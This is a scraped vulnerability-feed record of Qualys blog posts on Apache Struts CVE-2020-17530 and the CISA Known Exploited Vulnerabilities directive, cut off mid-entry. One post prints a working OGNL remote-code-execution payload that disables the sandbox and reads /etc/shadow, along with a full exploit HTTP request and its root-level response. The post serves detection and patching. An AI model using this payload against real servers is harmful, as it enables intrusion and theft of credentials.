"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-21T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Code Execution (CVE-2020-17530)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-21T00:00:00", "id": "CPAI-2020-1331", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-09-21T15:04:33", "description": "A vulnerability (CVE-2020-17530) discovered last year in the Object Graph Navigation Language (OGNL) evaluation function of Apache Struts versions 2.0.0 \u2013 2.5.25 can be exploited by attackers to perform remote code execution. This RCE vulnerability doesn\u2019t come packaged with Apache struts but is dependent on how the web application is configured, so a simple Apache version check cannot identify vulnerable systems.\n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has added a new QID to detect this vulnerability that sends a request to the target server to determine if it is exploitable. Once detected, the vulnerability can be remediated by upgrading to Apache Struts 2.5.26 or greater, which checks if expression evaluation won&#x27;t lead to the double evaluation to prevent exploitation. Qualys also advises to avoid using forced OGNL evaluation on untrusted user input.\n\n### About CVE-2020-17530\n\nApache Struts 2 is a well-known open-source web application framework for developing Java EE web applications that is widely targeted by hackers.\n\nAccording to CVE-2020-17530, Struts versions 2.0.0 - 2.2.25 are vulnerable to this exploit.\n\nThis vulnerability occurs when Apache Struts framework is forced to perform double evaluation of attributes assigned to some tag\u2019s attributes such as `id` if a developer has configured the application to perform forced OGNL evaluation using `%{..}` syntax.\n\nDouble evaluation is when an expression string gets evaluated as code, and then, if the result is another string, it gets evaluated as code again, the `%{..}` syntax indicates the content inside it should be treated as an OGNL expression.\n\n#### Example:\n \n \n <s: hidden name id=\"%{name}\"/>\n\nWhen a user passes a value `name=%{2*2}` the input is treated as OGNL script and is evaluated again generating output id=&quot;4\u2033, resulting in RCE.\n\nHence the user input value ends up getting evaluated twice when the tag\u2019s attributes are rendered.\n\n### Exploit Analysis\n\nBefore going forward with the exploitation, let\u2019s break the exploit to understand its core concept.\n\nFirst let\u2019s see what is [OGNL](<https://struts.apache.org/tag-developers/ognl>)? Object-Graph Navigation Language (OGNL) is an open-source Expression Language for Java, which, while using simpler expressions than the full range of those supported by the Java language, allows getting and setting properties, and execution of methods of Java classes.\n\nBeing able to create properties and change the code execution, it\u2019s prone to critical security flaws.\n\nWhile S2-061 exploit is basically a bypass of S2-059 sandbox environment, The sandbox restrictions imposed by OGNL enforces the validation of accessing packages, classes, and their normally private or protected methods/fields.\n\nThese private class and methods can be accessed and modified by creating a BeanMap instance.\n\n### RCE Code Analysis:\n \n \n %{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"cat /etc/shadow\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}\n \n\nApache Struts 2 contains internal security manager which blocks access to particular classes and Java packages - it\u2019s an OGNL-wide mechanism which means it affects any aspect of the [framework](<https://struts.apache.org/security/>).\n\nBelow are the three options that can be used to configure excluded packages and classes\n\n * struts.excludedClasses\n * struts.excludedPackageNamePatterns\n * struts.excludedPackageNames\n\nAnalyzing the first part of the exploit code we understand a [BeanMap](<https://commons.apache.org/proper/commons-beanutils/apidocs/org/apache/commons/beanutils/BeanMap.html>) instance is created and its `setBean` and `put` functions is used to set security mechanism options `excludedClasses` and `excludedPackageNames` to empty, these options contain the set of excluded classes and package names, thus nullifying the sandbox restrictions as every class and package access restrictions are now disabled.\n\nNow that the OGNL restrictions are completely disabled, In the later part of the code we can see code execution is achieved by using disallowed class `Execute` from [`freemarker.template.utility`](<https://freemarker.apache.org/docs/api/freemarker/template/utility/package-summary.html>) package, this `Execute` class allows `FreeMarker` the ability to execute external commands using `exec()` method.\n\n### Exploitation\n\nAttackers can execute system commands by sending the specially crafted HTTP request containing the OGNL payload to the target server like below:\n\nRequest:\n \n \n POST /index.action HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept-Encoding: gzip, deflate\n Connection: close\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 775\n \n id=%25{(%23instancemanager%3d%23application[\"org.apache.tomcat.InstanceManager\"]).(%23stack%3d%23attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(%23bean%3d%23instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(%23bean.setBean(%23stack)).(%23context%3d%23bean.get(\"context\")).(%23bean.setBean(%23context)).(%23macc%3d%23bean.get(\"memberAccess\")).(%23bean.setBean(%23macc)).(%23emptyset%3d%23instancemanager.newInstance(\"java.util.HashSet\")).(%23bean.put(\"excludedClasses\",%23emptyset)).(%23bean.put(\"excludedPackageNames\",%23emptyset)).(%23arglist%3d%23instancemanager.newInstance(\"java.util.ArrayList\")).(%23arglist.add(\"id\")).(%23execute%3d%23instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(%23execute.exec(%23arglist))}\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Connection: close\n Date: Tue, 24 Aug 2021 13:02:26 GMT\n Content-Language: en\n Content-Type: text/html;charset=utf-8\n Set-Cookie: JSESSIONID=node011cf0u95rdhdp1xsd64hecky246.node0; Path=/\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n Content-Length: 974\n Server: Jetty(9.4.31.v20200723)\n \n \n <html>\n <head>\n <title>S2-059 demo</title>\n </head>\n <body>\n <a id=\"uid=0(root) gid=0(root) groups=0(root)\" href=\"/index.action;jsessionid=node011cf0u95rdhdp1xsd64hecky246.node0\">\n your input id: %{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"id\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}\n has ben evaluated again in id attribute\n </a>\n </body>\n </html>\n\n### Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability with Qualys Web Application Scanning using **QID 150354**. Since this vulnerability is application configuration dependent, the QID sends a POST/GET request to the target server with OGNL RCE payload to confirm if the target is exploitable.\n\n\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results in the vulnerability scan report:\n\n\n\n### Solution\n\nAlthough this RCE vulnerability was discovered late last year, it\u2019s been seen in the wild and multiple exploit scripts are still being released.\n\nHence, we highly recommend upgrading to Apache Struts 2.5.26 or greater.\n\n### Credits\n\nApache Struts announcement was released on December 08, 2020: <https://struts.apache.org/announce-2020#a20201208>\n\nApache Security Bulletin:\n\n * <https://cwiki.apache.org/confluence/display/WW/S2-061>\n\nCVE details:\n\n * <https://nvd.nist.gov/vuln/detail/CVE-2020-17530>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17530>\n\nCredits for the vulnerability discovery goes to:\n\n * Alvaro Munoz - pwntester at github dot com\n * Masato Anzai of Aeye Security Lab, inc\n\nReferences:\n\n * <https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>\n * <https://struts.apache.org/security/#do-not-use-incoming-untrusted-user-input-in-forced-expression-evaluation>\n * <https://securitylab.github.com/research/apache-struts-double-evaluation/>\n * <https://www.rapid7.com/db/modules/exploit/multi/http/struts2_multi_eval_ognl/>\n * <https://github.com/ka1n4t/CVE-2020-17530>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Ed Arnold**, Security Solutions Architect, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T14:40:00", "type": "qualysblog", "title": "Apache Struts 2 Double OGNL Evaluation Vulnerability (CVE-2020-17530)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-09-21T14:40:00", "id": "QUALYSBLOG:FE0BAF7268104D525CC0A2ABC0471C4C", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection &amp; Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:&quot;true&quot;_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), &quot;Reducing the Significant Risk of Known Exploited Vulnerabilities.&quot; [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in &#x27;CISA&#x27;s vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations&#x27; digital infrastructure and automate remediation. Qualys&#x27; guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency&#x27;s behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA&#x27;s public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### 